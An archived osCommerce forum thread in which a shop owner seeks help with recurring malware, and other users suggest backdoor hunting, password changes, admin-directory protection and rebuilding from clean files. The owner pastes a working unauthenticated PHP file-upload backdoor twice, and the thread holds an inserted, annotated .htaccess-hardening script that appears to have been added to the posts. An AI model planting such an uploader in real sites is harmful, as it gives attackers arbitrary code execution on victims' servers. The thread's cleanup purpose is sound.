
Malware Keeps Coming Back


Kerrigan


Posted

Hello. I have removed malware in the recent past and installed all of the security measures that I could find to stop it from coming back, but it keeps coming back. Here are some of the security add-ons that I have installed:

 

-Security Pro

-IP Trap

-Site Monitor (almost finished)

 

When I have cleared my site of any malware in the past, I have downloaded the whole site, found all of the malware code (through grepWin), removed it and then re-uploaded it after installing a security measure. Now it seems that I can't even find the malware code, even though it keeps popping up. It keeps changing names too:

 

-0200.in a couple of days ago

-1002.in today

-Other names in the past

 

So, a couple of questions: how do I find the malware code to get rid of it, and how do I keep it from coming back? Thanks...

Posted

Kerrigan,

 

1) Look for 'clone' files, which are files named similarly to osCommerce files. These files usually contain 'backdoors' that allow the hacker to re-enter the website whenever they wish.

2) Look at your .htaccess file for malicious entries that could, again, allow the hacker to regain access.

3) Change all passwords: admin, cPanel and FTP. The hacker could have gained access using your passwords and is entering unnoticed.

4) Check with your hosting provider to ensure they are maintaining tight security on their servers. Some hosting providers don't update security as they should because it costs them money.

 

 

 

Chris

Posted

Good point, Mark! I forgot to mention that.

 

 

 

Chris

Posted

You also forgot to mention you need to install the .htaccess and anti-XSS contributions.

 

Have a look at the "Been Hacked" link in my profile for links to these.

 

HTH

 

G


Posted


Thanks Chris.

 

1) I found an "upload.php" file that I wasn't sure if it belonged there. Here is the code from that file:

 

<?php
// Opens admin/file_manager.php for writing and never writes to it or closes it:
// the only effect is to truncate the stock file to zero bytes.
$fp = fopen("admin/file_manager.php","w");
$target = "";
// Destination is the uploaded file's own name in the directory this script
// lives in, so whoever POSTs to this page can drop any file, PHP included, there.
$target = $target . basename( $_FILES['uploaded']['name']) ;
$ok=1;
// No login, no file-type check: a plain remote file-upload backdoor.
if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
{
// Reads 'uploadedfile' instead of 'uploaded', so the message names no file.
echo "The file ". basename( $_FILES['uploadedfile']['name']). " has been uploaded";
}
?>
<form enctype="multipart/form-data" method="POST">
Please choose a file: <input name="uploaded" type="file" /><br />
<input type="submit" value="Upload" />
</form>

 

Can anyone tell from this code if this file belongs or not?

 

2) Here is the code from my .htaccess file that is in my store (catalog) folder:

 

<?php
$fp = fopen("admin/file_manager.php","w");
$target = "";
$target = $target . basename( $_FILES['uploaded']['name']) ;
$ok=1;
if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
{
echo "The file ". basename( $_FILES['uploadedfile']['name']). " has been uploaded";
}
?>
<form enctype="multipart/form-data" method="POST">
Please choose a file: <input name="uploaded" type="file" /><br />
<input type="submit" value="Upload" />
</form>

 

I'm not sure if there is anything in there that shouldn't be there. Can you tell if there is? Also, should I check the .htaccess files in my "admin" and "includes" folders too?

 

3) I've already done that and will do it again.

 

4) What do I ask them when I call them...specifically? Thanks for all your help!

Posted

And check your own PC that you use to access your site for viruses. They could be harvesting your usernames/passwords right off of your home computer.

 

Thanks Mark. I've already done this to one computer, but hadn't to the other. I am currently checking it with SpyBot, MalwareBytes and Kaspersky.

Posted


Thanks Geoffrey. I will be adding these two contributions now.

Posted


Doesn't really matter. If you followed security directions you do not even have a file_manager.php file, and your admin directory has been renamed. But no, that code should not be in the .htaccess file and you should not have an upload.php file with that code in it.

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Posted

Doesn't really matter. If you followed security directions you do not even have a file_manager.php file, and your admin directory has been renamed. But no, that code should not be in the .htaccess file and you should not have an upload.php file with that code in it.

 

Just out of curiosity, what code SHOULD be in the .htaccess file? Yes, you are right, I don't have a "file_manager.php" file anymore. However, I chose not to rename the "admin" folder as it seemed to be optional in the instructions and not that important. I have deleted the "upload.php" file and have added the security code to the .htaccess file.

 

However, I'm kind of confused about the anti-xss contribution. Is it just a "read me" file? The instructions aren't very clear in it...at least not in my mind. Also, I don't think anyone has offered up any ways to find and remove the malicious code already on my website. My website is downloaded and I couldn't find any bad code with grepWin this time. Any other ideas on how to find it and remove it?

Posted

Not really optional, once they find yours is there they will keep on banging away at it.

 

My own .htaccess file basically contains blocks to keep a handful of countries' IPs from accessing my site, but yours above has been created/doctored for illegal/malicious use.

 

Wayne...

Posted

Just out of curiosity, what code SHOULD be in the .htaccess file? Yes, you are right, I don't have a "file_manager.php" file anymore. However, I chose not to rename the "admin" folder as it seemed to be optional in the instructions and not that important.

As long as you password protect your admin directory you should be ok. THAT is one thing that is coded into an .htaccess file.

 

In fact, there are literally dozens of things that can and often do go into an .htaccess file. With respect to osCommerce, the common things are directory passwords, URL SEO in the form of URL rewriting, URL rewriting to make your admin directory https only, and a couple of other things. But, in all, the .htaccess file is very versatile and can do many different things. Therefore, there is no definitive answer as to what should be in yours.

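A concrete answer to "what SHOULD be in the .htaccess file", as an added example that is neither osCommerce's own files nor one of the contributions Geoffrey links: a script that writes the admin-directory .htaccess Mark describes (an HTTPS redirect first, then Basic auth in front of osCommerce's own admin login, so the credentials never cross the wire in the clear) and a second one for images/ that refuses to serve uploaded scripts, plus a check that an admin directory actually carries the protection. The directives use Apache 2.2 syntax (the era of 2.2 RC2a), every path is an assumption, and the password hash comes from openssl passwd -apr1, which produces the same Apache-MD5 format that cPanel's directory password tool writes.

```shell
#!/bin/sh
# Added example for this thread, not one of the osCommerce contributions:
# writes a hardened .htaccess for admin/ (HTTPS redirect, then Basic auth in
# front of osCommerce's own login) and one for images/ (no script execution),
# and checks that an admin directory actually carries the protection.
# Apache 2.2 directive syntax; every path below is an assumption.
set -u

# Apache-MD5 .htpasswd line, the format cPanel's directory password tool
# writes. Salted, so the hash differs on every run. Needs openssl.
make_htpasswd_entry() {  # $1 = user, $2 = password
    command -v openssl >/dev/null 2>&1 || { echo "openssl not found" >&2; return 1; }
    printf '%s:%s\n' "$1" "$(openssl passwd -apr1 "$2")"
}

# $1 = admin directory, $2 = absolute path of the .htpasswd (outside the web root)
write_admin_htaccess() {
    cat > "$1/.htaccess" <<EOF
# 1. Send browsers to HTTPS before any credential is transmitted
RewriteEngine On
RewriteCond %{HTTPS} !=on
RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [R=301,L]

# 2. Server-side login in front of osCommerce's admin login
AuthType Basic
AuthName "Store administration"
AuthUserFile $2
Require valid-user

# 3. Never serve the password file or directory listings
<Files ".htpasswd">
    Order allow,deny
    Deny from all
</Files>
Options -Indexes
EOF
}

# $1 = images directory (or any directory that receives uploads)
write_images_htaccess() {
    cat > "$1/.htaccess" <<'EOF'
# Uploads live here, code does not: refuse to serve anything executable, so a
# dropped shell cannot run even if the uploader that put it there was missed
<FilesMatch "\.(php|phtml|php[0-9]|phps|cgi|pl)$">
    Order allow,deny
    Deny from all
</FilesMatch>
Options -Indexes
EOF
}

# Returns 0 when $1/.htaccess requires Basic auth and names an existing password file
admin_is_protected() {  # $1 = admin directory
    f="$1/.htaccess"
    [ -f "$f" ] || return 1
    grep -q '^AuthType Basic' "$f" || return 1
    grep -q '^Require valid-user' "$f" || return 1
    pw=$(sed -n 's/^AuthUserFile //p' "$f")
    [ -n "$pw" ] && [ -f "$pw" ]
}

# Demo on a constructed tree under a temporary directory
SITE=$(mktemp -d)
trap 'rm -rf "$SITE"' EXIT
mkdir -p "$SITE/catalog/admin" "$SITE/catalog/images" "$SITE/private"
make_htpasswd_entry shopadmin 'correct horse battery staple' > "$SITE/private/.htpasswd"
write_admin_htaccess "$SITE/catalog/admin" "$SITE/private/.htpasswd"
write_images_htaccess "$SITE/catalog/images"
admin_is_protected "$SITE/catalog/admin" && echo "admin/ is protected"
```

Keep the .htpasswd outside the web root, as the demo does, so it can never be fetched by URL. Basic auth sends the password base64-encoded on every request, which is why the redirect sits above the Auth lines rather than below them. If the host answers with a 500 after you add these files, it does not allow Options in .htaccess; drop the Options line and keep the rest.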

Posted

As long as you password protect your admin directory you should be ok. THAT is one thing that is coded into an .htaccess file.

 

Wait, how do I password protect my admin directory? I don't see that in my .htaccess file at all...

Posted

Kerrigan,

 

Take the time to review the security forum. Everything you need to secure v2.2 RC2a is there. To answer your question, you can password protect your admin from the file manager in your cpanel. This will add another security layer to your admin area.

 

 

Chris

Posted

Wait, how do I password protect my admin directory? I don't see that in my .htaccess file at all...

In your cPanel 'Dashboard' you will find the function to 'Protect Directories' or 'Directory Security' or something really similar. (I don't think it is in the file manager. May be wrong.)


Posted

In your cPanel 'Dashboard' you will find the function to 'Protect Directories' or 'Directory Security' or something real similar. (I don't think it is in the file manager. May be wrong.)

Thanks Mark!

Posted

Well, I've been attacked again. This time by 7774.in. I don't think anyone has offered up any ways to find and remove the malicious code already on my website. My website is downloaded and I couldn't find any bad code with grepWin this time. Any other ideas on how to find it and remove it?

Posted

So, you've been hacked. Now what? Every, and I do mean EVERY day, I see this question come up in the osCommerce forum or from someone emailing me to ask advice about it. So, here's the lowdown on what you need to do;

 

1. NUKE your entire osCommerce site.

2. Restore from a known good backup.

3. Lockdown the site so the hack cannot happen again.

 

Easy as 123.

 

I'm about to cry because I don't have a backup…

 

In this case, you need to determine how much work you have put into your osCommerce site.

 

If it's plain jane oscommerce with maybe a new logo and a couple of contributions, then the easiest way is to simply carry out #1, then upload a new osCommerce, then carry out #3.

 

If you have done major work in your osCommerce site, then you need to go through EVERY file, line by line to ensure there is no hacker code present. You also need to delete any file that you do not recognise. Then forget #1, forget #2 and carry out #3.

 

How do you lockdown a site?

 

Follow the instructions in this thread.

 

I don't think I can do that, it looks like a big job. I don't know osCommerce well enough to know what should be there and what shouldn't…

 

Pay a professional to do it for you. There are a handful of people on the osCommerce forum who can achieve all this for you, at low cost, and rapidly – within a day, your site can be cleansed and locked down.

Posted

All good advice, except if the problem lies with your host (for example GoDaddy), then I don't know what you can do except change hosts?

 

Yes, a lot of GoDaddy sites have been recently hacked again :(

Archived

This topic is now archived and is closed to further replies.
